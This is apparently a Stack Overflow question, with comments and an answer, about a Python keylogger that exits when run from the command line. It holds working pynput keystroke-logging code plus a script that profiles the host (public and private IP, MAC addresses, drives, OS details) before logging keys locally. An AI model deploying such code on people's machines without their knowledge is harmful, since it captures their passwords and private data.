# Python Keylogger - Not keeping Keyboard Listener open upon execution from CMD

Tags: python, keylogger, system-information

BEFORE WE START...

I am fairly new to Python and any assistance or insight would be absolutely great.

**This is NOT malicious keylogger, nor a virus, and is going to be used by my company to monitor network PCs for security purposes ONLY. It does not send logs and stores the files locally. It will not attempt to remain hidden. I am an enterprise programmer with no malicious intent. Users will be made aware that keystrokes are being monitored, and logs are stored in the user's home directory.**

My Python works perfectly fine and as expected in the IDLE editor. However upon running the code from the command line, it does not continue to execute and the script exits.

I have attempted to port my code line by line to a different working version, removing any extra content. Adding a single line break or import appears to completely break the script.

The following code works and does not exit upon execution. It continues to log and works as expected. When ran from CMD, the process remains open:

```py
from os.path import expanduser
home = expanduser("~")

from pynput.keyboard import Key, Listener
import logging
log_dir = r"{}/".format(home)
logging.basicConfig(filename = (log_dir + "log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
    logging.info(str(key))
with Listener(on_press=on_press) as listener:
    listener.join()
```

However the following code does not continue to log after execution and the program exits:

```py
from pynput.keyboard import Key, Listener
import time
import os
import random
import requests
import socket
import platform
import win32api
import wmi
import urllib.request
import logging

from os.path import expanduser
homeDir = expanduser("~")

SystemType = platform.system()
SystemArchitecture = platform.machine()
SystemPlatform = platform.platform()
SystemProcessor = platform.processor()
VolumeInformation = win32api.GetVolumeInformation("C:\\")
HostName = socket.gethostname()
SystemWMI = wmi.WMI()

publicIP = requests.get('https://api.ipify.org').text
privateIP = socket.gethostbyname(socket.gethostname())
user = os.path.expanduser('~').split('\\')[2]
datetime = time.ctime(time.time())

file = open(homeDir + "\logger.txt", "w+")

file.write("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

print("Hostname: " + HostName)
file.write("Hostname: " + HostName + "\n")

print("User: " + user)
file.write("User: " + user + "\n")

print("Public IP: " + publicIP)
file.write("Public IP: " + publicIP + "\n")

print("Private IP: " + privateIP)
file.write("Private IP: " + privateIP + "\n")

for interface in SystemWMI.Win32_NetworkAdapterConfiguration (IPEnabled=1):
    print("MAC Address: " + interface.MACAddress)
    file.write("MAC Address: " + interface.MACAddress + "\n")
    print("Interface Description: " + interface.Description)
    file.write("Interface Description: " + interface.Description + "\n\n")

print()
file.write("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

if(SystemType == "Windows"):    
    print("System Type: " + SystemType)
    file.write("System Type: " + SystemType + "\n")

    print("System Architecture: " + SystemArchitecture)
    file.write("System Architecture: " + SystemArchitecture + "\n")

    print("System Platform: " + SystemPlatform)
    file.write("System Platform: " + SystemPlatform + "\n")

    print("System Processor: " + SystemProcessor)
    file.write("System Processor: " + SystemProcessor + "\n\n")

    DriveList = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    ActiveDrives = ['%s:' % d for d in DriveList if os.path.exists('%s:' % d)]

    DRIVE_TYPES = {
      0 : "Unknown",
      1 : "No Root Directory",
      2 : "Removable Disk",
      3 : "Local Disk",
      4 : "Network Drive",
      5 : "Compact Disc",
      6 : "RAM Disk"
    }

    print()
    file.write("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

    print("Drives In Use: ")
    file.write("Drives In Use: \n")

    print(ActiveDrives)
    file.write(str(ActiveDrives) + "\n\n")

    print()
    file.write("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

    print("Drive Types: ")
    file.write("Drive Types: \n\n")

    for drive in SystemWMI.Win32_LogicalDisk ():
        print(drive.Caption, DRIVE_TYPES[drive.DriveType])
        file.write(drive.Caption)
        file.write(DRIVE_TYPES[drive.DriveType] + "\n")

    print()
    file.write("\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

    print("C:\\ Volume Information")
    file.write("C:\\ Volume Information: \n")

    print(VolumeInformation)
    file.write(str(VolumeInformation) + "\n\n")

    print()
    file.write("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

    print("OS Instance Information: ")
    file.write("OS Instance Information: \n")

    for os in SystemWMI.Win32_OperatingSystem():
        print(os)
        file.write(str(os) + "\n")

print()
file.write("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n")

print("Logging keystrokes...")
file.write("Logging keystrokes...\n\n")

file.close()

log_dir = r"{}/".format(homeDir)
logging.basicConfig(filename = (log_dir + "logger.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    print(key)
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

Even adding a single import to the working version breaks it. There are no exceptions thrown.

The code is expected to continue to log keystrokes after execution, however is exiting without any error codes. It works as expected in IDLE and continues to log until IDLE is closed. However when ran from CMD it closes right after it outputs "Logging Keystrokes...".

Help?

Comment: That's a pretty big snippet of code to read through, can you narrow down where things are going wrong? ie: take the working example and add in 1 small block of logic at a time until it breaks -- then remove the parts that didn't break -- verify it's still broken and share what's left -- old adage about code reviews:: reviewing 50 lines -- find 10 things -- reviewing 5000 lines -- it's good

Comment: @Alvin if you could read through it, that would be a great help. That's actually what I tried to do, and the part that seems to not be working is: 

def on_press(key):
    print(key)
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join(). It works in the tiny snippet, but not in the larger one. I have pulled the code line by line and have no idea what could be causing it. The listener should continue to "listen" and append to the log file, however it does not.

Comment: @Alvin if you drop the code into IDLE and run it, and then you save it and run it, you will see what i mean almost immediately.

Comment: Hey @Cody MacLeod -- welcome to stack overflow -- no-one here is paid to solve your problems it's about community building so the easier it is to help you the more help you'll get -- happy coding

Answer (score 0):

Come to find out, it was the antivirus on the PC that was causing the program to crash. This works normally and as expected from the getgo.